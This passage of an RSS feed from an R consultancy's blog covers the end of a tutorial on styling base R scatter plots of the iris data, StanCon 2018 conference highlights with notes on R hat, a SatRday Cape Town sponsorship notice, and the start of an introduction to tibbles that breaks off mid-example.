&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mtext&lt;/span&gt;(side &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; at, at &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; at,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey20&amp;#34;&lt;/span&gt;, line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, cex &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.9&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and the y-axis&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;at &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pretty&lt;/span&gt;(iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Width)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mtext&lt;/span&gt;(side &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; at, at &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; at, col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey20&amp;#34;&lt;/span&gt;, line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, cex &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.9&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This just leaves the legend. Instead of using the &lt;code&gt;legend()&lt;/code&gt; function, we’ll place the names next to the points via the &lt;code&gt;text()&lt;/code&gt; function&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;text&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4.2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;setosa&amp;#34;&lt;/span&gt;, col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rgb&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;79&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;178&lt;/span&gt;, maxColorValue &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;text&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;5.3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2.1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;versicolor&amp;#34;&lt;/span&gt;, col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rgb&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;105&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;147&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;45&lt;/span&gt;, maxColorValue &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;text&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3.7&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;virginica&amp;#34;&lt;/span&gt;, col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rgb&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;85&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;130&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;169&lt;/span&gt;, maxColorValue &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, we have the plot title&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;title&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;The infamous IRIS data&amp;#34;&lt;/span&gt;, adj &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cex.main &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.8&lt;/span&gt;, font.main &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, col.main &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Putting it all together gives&lt;/p&gt;
&lt;img class="image-center" src="plot2-1.svg" style="width:500px; class:image-center"&gt;
&lt;p&gt;A much better job.&lt;/p&gt;
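&lt;p&gt;One caveat with the steps above: both &lt;code&gt;palette()&lt;/code&gt; and &lt;code&gt;par()&lt;/code&gt; change global settings, so later plots in the same session inherit them. A minimal sketch of saving and restoring those settings might look like the following. The &lt;code&gt;pdf(NULL)&lt;/code&gt; device is only an assumption made so the example runs without opening a window, and the cut-down &lt;code&gt;plot()&lt;/code&gt; call stands in for the full version above.&lt;/p&gt;

```r
# Throwaway device, so the sketch also runs non-interactively
pdf(NULL)

# Remember the current settings before changing anything
old_par = par(no.readonly = TRUE)
old_palette = palette()

# Restyle, then plot (a shortened version of the code above)
alpha = 150
palette(c(rgb(200, 79, 178, alpha = alpha, maxColorValue = 255),
          rgb(105, 147, 45, alpha = alpha, maxColorValue = 255),
          rgb(85, 130, 169, alpha = alpha, maxColorValue = 255)))
par(mar = c(3, 3, 2, 1), las = 1)
plot(iris$Sepal.Length, iris$Sepal.Width, bg = iris$Species, pch = 21)

# Put everything back as it was
par(old_par)
palette(old_palette)
restored_mar = par("mar")
restored_palette = palette()

invisible(dev.off())
```

&lt;p&gt;Inside a function, the same idea is often written with &lt;code&gt;on.exit()&lt;/code&gt; so the settings are restored even if the plotting code fails.&lt;/p&gt;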
&lt;h2 id="why-not-use-ggplot2-or-something-else"&gt;Why not use {ggplot2} (or something else)?&lt;/h2&gt;
&lt;p&gt;This seems like a lot of work to create a simple scatter plot. Why not use X, Y, or {ggplot2}? We even have a course on &lt;a href="https://www.jumpingrivers.com/training/course/advanced-graphics-ggplot2-r/"&gt;{ggplot2}&lt;/a&gt; so we’re not biased. The purpose of this article isn’t to get into a religious visualisation war on base R vs … However, if you want such a war, have a look at the blog posts by &lt;a href="http://flowingdata.com/2016/03/22/comparing-ggplot2-and-r-base-graphics/" rel="external"&gt;Flowing Data&lt;/a&gt;, &lt;a href="https://simplystatistics.org/2016/02/11/why-i-dont-use-ggplot2/" rel="external"&gt;Jeff Leek&lt;/a&gt; and &lt;a href="http://varianceexplained.org/r/why-I-use-ggplot2/" rel="external"&gt;David Robinson&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;One point that is worth making is that since we are only using base R functions, our plot will almost certainly be reproducible for all future versions of R! Not something to quickly dismiss.&lt;/p&gt;
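&lt;p&gt;One detail matters if the figure has to be reproduced exactly: &lt;code&gt;jitter()&lt;/code&gt; adds random noise, so two runs of the code give slightly different point positions. A small sketch of fixing this with &lt;code&gt;set.seed()&lt;/code&gt; is shown below; the seed value is arbitrary and chosen purely for illustration.&lt;/p&gt;

```r
# Fix the random number generator before jittering
set.seed(2018)
first = jitter(iris$Sepal.Length)

# Resetting the same seed reproduces exactly the same noise
set.seed(2018)
second = jitter(iris$Sepal.Length)

same_points = identical(first, second)

# Size of the largest shift applied to any point
largest_shift = max(abs(first - iris$Sepal.Length))
```

&lt;p&gt;Here the jittered values are stored in new vectors rather than written back into &lt;code&gt;iris&lt;/code&gt;, which keeps the original measurements available for any later analysis.&lt;/p&gt;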
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/styling-base-r-graphics/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>StanCon 2018 Highlights</title><link>https://www.jumpingrivers.com/blog/stancon-2018-highlights/</link><pubDate>Wed, 24 Jan 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/stancon-2018-highlights/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/stancon-2018-highlights/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/stancon-2018-highlights/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This year we had the privilege of sponsoring &lt;a href="http://mc-stan.org/events/stancon2018/" rel="external"&gt;StanCon&lt;/a&gt;. Unfortunately, we weren’t able to actually attend the conference. Rather than let our ticket go to waste, we ran a small &lt;a href="https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/"&gt;competition&lt;/a&gt;, which &lt;a href="http://home.ignacio.website/" rel="external"&gt;Ignacio Martinez&lt;/a&gt; won with his very cool (but in alpha stage) &lt;a href="https://github.com/ignacio82/IMposterior" rel="external"&gt;R package&lt;/a&gt;.&lt;/p&gt;
&lt;img class="image-center" src="stancon_comp.gif" style="width:400px; class:image-center"&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-stancon-2018-highlights"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="highlights-from-stancon-2018"&gt;Highlights from StanCon 2018&lt;/h2&gt;
&lt;p&gt;During my econ PhD I learned a lot about frequentist statistics. Alas, my training in Bayesian statistics was limited. Three years ago, I joined &lt;a href="https://twitter.com/MathPolResearch" rel="external"&gt;@MathPolResearch&lt;/a&gt; and started delving into this whole new world. Two weeks ago, thanks to &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;@jumping_uk&lt;/a&gt;, I was able to attend &lt;a href="http://mc-stan.org/events/stancon2018/" rel="external"&gt;StanCon&lt;/a&gt;. This was an amazing experience, which allowed me to meet some great people and learn a lot from them. These are my highlights from the conference:&lt;/p&gt;
&lt;p&gt;You’d better have a very good reason to not use hierarchical models. &lt;a href="http://discourse.mc-stan.org/u/bgoodri/summary" rel="external"&gt;Ben Goodrich&lt;/a&gt;’s tutorial on advanced hierarchical models was great. Most social science data has a natural hierarchy and modeling it using Stan is easy! Slides for this three day tutorial are available here: [&lt;a href="http://mc-stan.org/events/stancon2018/AHM/AHM1.pdf" rel="external"&gt;day 1&lt;/a&gt;, &lt;a href="http://mc-stan.org/events/stancon2018/AHM/AHM2.pdf" rel="external"&gt;day 2&lt;/a&gt;, &lt;a href="http://mc-stan.org/events/stancon2018/AHM/AHM3.pdf" rel="external"&gt;day 3&lt;/a&gt;].&lt;/p&gt;
&lt;p&gt;Everyone should take his or her model to the &lt;a href="https://cran.r-project.org/web/packages/loo/" rel="external"&gt;loo&lt;/a&gt;. &lt;a href="https://twitter.com/avehtari" rel="external"&gt;@avehtari&lt;/a&gt;’s excellent tutorial covered cross-validation, reference predictive and projection predictive approaches for model assessment, selection and inference after model selection. This tutorial is &lt;a href="https://github.com/avehtari/modelselection_tutorial" rel="external"&gt;available online&lt;/a&gt;, and everyone using Stan should do it.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://discourse.mc-stan.org/u/bob_carpenter/summary" rel="external"&gt;Bob Carpenter&lt;/a&gt;’s tutorial on how to verify fit and diagnose convergence answered many practical and theoretical questions I had. Bob did a great job explaining how the effective sample sizes and potential scale reduction factors (“R hats”) are calculated. He also gave us some practical rules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We want R hat to be less than 1.05 and greater than 0.9&lt;/li&gt;
&lt;li&gt;R hat equal to 1 does not guarantee convergence&lt;/li&gt;
&lt;li&gt;An effective sample size between 50 and 100 is enough&lt;/li&gt;
&lt;li&gt;Don’t be afraid to ask questions on the &lt;a href="http://discourse.mc-stan.org/t/how-can-i-solve-bfmi-low-problem/3018/14" rel="external"&gt;Stan forum&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
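&lt;p&gt;To make the first rule a little more concrete, here is a rough base R sketch of the classic (non-split) potential scale reduction factor, computed on simulated draws rather than real Stan output. The chain length, number of chains and variable names are all assumptions made for illustration; Stan reports more refined versions of this diagnostic, so treat this only as a way to see where the number comes from.&lt;/p&gt;

```r
set.seed(1)
n = 1000  # Draws per chain (illustrative)
m = 4     # Number of chains (illustrative)

# Simulated "chains": one column per chain, all from the same distribution
chains = matrix(rnorm(n * m), nrow = n, ncol = m)

# Within-chain variance: average of the per-chain variances
W = mean(apply(chains, 2, var))

# Between-chain variance: spread of the chain means, scaled by n
B = n * var(colMeans(chains))

# Pooled estimate of the posterior variance
var_plus = (n - 1) / n * W + B / n

# Potential scale reduction factor
rhat = sqrt(var_plus / W)
```

&lt;p&gt;Because all four simulated chains target the same distribution, &lt;code&gt;rhat&lt;/code&gt; comes out very close to 1. Chains that have settled in different regions inflate &lt;code&gt;B&lt;/code&gt;, and with it R hat.&lt;/p&gt;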
&lt;p&gt;The Bayesian Decision Making for Executives and Those who Communicate with Them series by Eric Novik and Jonathan Auerbach had some very good advice:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Before model building, ask: What decisions are you trying to make? What is the cost of the wrong decision? What is the gain from a good decision?&lt;/li&gt;
&lt;li&gt;During model building: Elicit enough information about the problem so that a generative model can be expressed. This is very hard. A lot depends on the industry (e.g., book publishers are very different from pharma companies).&lt;/li&gt;
&lt;li&gt;After the model has been fit: Communicate the results so stakeholders can make a decision. Some things to keep in mind when doing so include:
&lt;ul&gt;
&lt;li&gt;Stakeholders should not care about p-values, Bayes factors or ROC curves (but sometimes do).&lt;/li&gt;
&lt;li&gt;Stakeholders should care about the uncertainty in your estimates, but often they do not.&lt;/li&gt;
&lt;li&gt;Stakeholders should know their loss or utility function, but they often do not.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To sum this up, the Stan developers are an incredibly talented and generous group of people who have created a useful and flexible programming language and a fantastic community around it. I look forward to future StanCons. A few other things that I am looking forward to in the nearer future (and I under&lt;a href="https://www.youtube.com/watch?v=pWow8Qe1snQ" rel="external"&gt;&lt;em&gt;Stan&lt;/em&gt;&lt;/a&gt;d are coming soon…):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A series of Coursera massive open online courses (MOOCs)&lt;/li&gt;
&lt;li&gt;Support for parallel computing with MPI and GPUs&lt;/li&gt;
&lt;li&gt;loo 2.0&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/stancon-2018-highlights/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRday in South Africa</title><link>https://www.jumpingrivers.com/blog/satrday-in-south-africa/</link><pubDate>Fri, 19 Jan 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrday-in-south-africa/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrday-in-south-africa/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrday-in-south-africa/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; is proud to be sponsoring the upcoming &lt;a href="http://capetown2018.satrdays.org/" rel="external"&gt;SatRday&lt;/a&gt; conference in Cape Town, South Africa on 17th March 2018.&lt;/p&gt;
&lt;img class="image-center" src="satrdays_jr.png" style="width:500px; class:image-center"&gt;
&lt;h2 id="what-is-satrday"&gt;What is SatRday?&lt;/h2&gt;
&lt;p&gt;SatRdays are a collection of free or cheap, accessible R conferences organised by members of the R community at various locations across the globe. Each SatRday looks to provide talks and/or workshops by R programmers covering the language and its applications, and is run as a not-for-profit event. They provide a great place to meet like-minded people, be it researchers, data scientists, developers or enthusiasts, to discuss your passion for R programming.&lt;/p&gt;
&lt;h2 id="satrday-in-cape-town"&gt;SatRday in Cape Town&lt;/h2&gt;
&lt;p&gt;This year’s SatRday in Cape Town has a collection of workshops on the days running up to the conference on the Saturday. For more detailed information concerning speakers, workshop topics and registration, head on over to &lt;a href="http://capetown2018.satrdays.org/" rel="external"&gt;http://capetown2018.satrdays.org/&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="be-in-it-to-win-it"&gt;Be in it to win it&lt;/h2&gt;
&lt;p&gt;In addition to sponsoring the conference this year, Jumping Rivers is also giving you the chance to win a free ticket. To be in with a chance just respond to the tweet below:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://twitter.com/DataWookie/status/953867344790609920" rel="external"&gt;https://twitter.com/DataWookie/status/953867344790609920&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrday-in-south-africa/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>The Trouble with Tibbles</title><link>https://www.jumpingrivers.com/blog/the-trouble-with-tibbles/</link><pubDate>Mon, 08 Jan 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/the-trouble-with-tibbles/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/the-trouble-with-tibbles/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/the-trouble-with-tibbles/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Let’s get something straight: there isn’t really any trouble with tibbles. I’m hoping you’ve noticed this is a play on the 1967 &lt;a href="https://en.wikipedia.org/wiki/The_Trouble_with_Tribbles" rel="external"&gt;Star Trek episode&lt;/a&gt;, “The Trouble with Tribbles”. I’ve recently got myself a job as a Data Scientist here at &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;. Having never come across tibbles until this point, I now find myself using them in nearly every R script I compose, be that your timeless standard R script, your friendly Shiny app or an analytical Markdown document.&lt;/p&gt;
&lt;h2 id="what-are-tibbles"&gt;What are tibbles?&lt;/h2&gt;
&lt;p&gt;Presumably this is why you came here, right?&lt;/p&gt;
&lt;p&gt;Tibbles are a modern take on data frames, but crucially they are &lt;em&gt;still&lt;/em&gt; data frames. Well, what’s the difference then? There’s a quote I found somewhere on the internet that describes the difference quite well:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;“keeping what time has proven to be effective, and throwing out what is not”&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Basically, some clever people took the classic &lt;code&gt;data.frame()&lt;/code&gt;, shook it until the ineffective parts fell out, then added some new, more appropriate features.&lt;/p&gt;
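&lt;p&gt;As a taste of the kind of behaviour that was shaken out, here is a small base R sketch of two classic &lt;code&gt;data.frame()&lt;/code&gt; surprises. The data frame and its column names are made up for illustration; tibbles, by contrast, are designed to avoid both of these.&lt;/p&gt;

```r
# A tiny, made-up data frame
df = data.frame(value = 1:3, label = c("a", "b", "c"))

# Surprise 1: partial matching. There is no column called "val",
# but $ quietly returns the "value" column anyway
partial = df$val

# Surprise 2: selecting a single column with [ drops the data frame
# and hands back a plain vector
single = df[, "value"]

is_still_df = is.data.frame(single)
```

&lt;p&gt;With a tibble, &lt;code&gt;$&lt;/code&gt; does not partially match column names and &lt;code&gt;[&lt;/code&gt; always returns another tibble.&lt;/p&gt;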
&lt;h2 id="precursors"&gt;Precursors&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# The easiest way to get access is to install the tibble package.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tibble&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Alternatively, tibbles are a part of the tidyverse and hence&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# installing the whole tidyverse will give you access.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# I am just going to use tibble.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tibble&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-the-trouble-with-tibbles"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="tribblemaking"&gt;Tribblemaking&lt;/h2&gt;
&lt;p&gt;There are three ways to form a tibble, and each works much as it does with your friendly old pal &lt;code&gt;data.frame()&lt;/code&gt;. Just like standard data frames, we can create tibbles, coerce objects into tibbles and import data sets into &lt;code&gt;R&lt;/code&gt; as a tibble. Below is a table of the traditional &lt;code&gt;data.frame()&lt;/code&gt; commands and their respective {tidyverse} commands.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;Formation Type&lt;/th&gt;
&lt;th style="text-align: left"&gt;Data Frame Commands&lt;/th&gt;
&lt;th style="text-align: left"&gt;Tibbles Commands&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;&lt;em&gt;Creation&lt;/em&gt;&lt;/td&gt;
&lt;td style="text-align: left"&gt;&lt;code&gt;data.frame()&lt;/code&gt;&lt;/td&gt;
&lt;td style="text-align: left"&gt;&lt;code&gt;data_frame()&lt;/code&gt; &lt;code&gt;tibble()&lt;/code&gt; &lt;code&gt;tribble()&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;&lt;em&gt;Coercion&lt;/em&gt;&lt;/td&gt;
&lt;td style="text-align: left"&gt;&lt;code&gt;as.data.frame()&lt;/code&gt;&lt;/td&gt;
&lt;td style="text-align: left"&gt;&lt;code&gt;as_data_frame()&lt;/code&gt; &lt;code&gt;as_tibble()&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;&lt;em&gt;Importing&lt;/em&gt;&lt;/td&gt;
&lt;td style="text-align: left"&gt;&lt;code&gt;read.*()&lt;/code&gt;&lt;/td&gt;
&lt;td style="text-align: left"&gt;&lt;code&gt;read_delim()&lt;/code&gt; &lt;code&gt;read_csv()&lt;/code&gt; &lt;code&gt;read_csv2()&lt;/code&gt; &lt;code&gt;read_tsv()&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Let’s take a closer look…&lt;/p&gt;
&lt;h4 id="1-creation"&gt;1) Creation.&lt;/h4&gt;
&lt;p&gt;Just as &lt;code&gt;data.frame()&lt;/code&gt; creates data frames, &lt;code&gt;tibble()&lt;/code&gt;, &lt;code&gt;data_frame()&lt;/code&gt; and &lt;code&gt;tribble()&lt;/code&gt; all create tibbles.&lt;/p&gt;
&lt;p&gt;Standard data frame.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(a &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, b &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## a b
## 1 1 a
## 2 2 b
## 3 3 c
## 4 4 d
## 5 5 e
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;A tibble using &lt;code&gt;tibble()&lt;/code&gt; (identical to using &lt;code&gt;data_frame&lt;/code&gt;).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(a &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, b &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;])
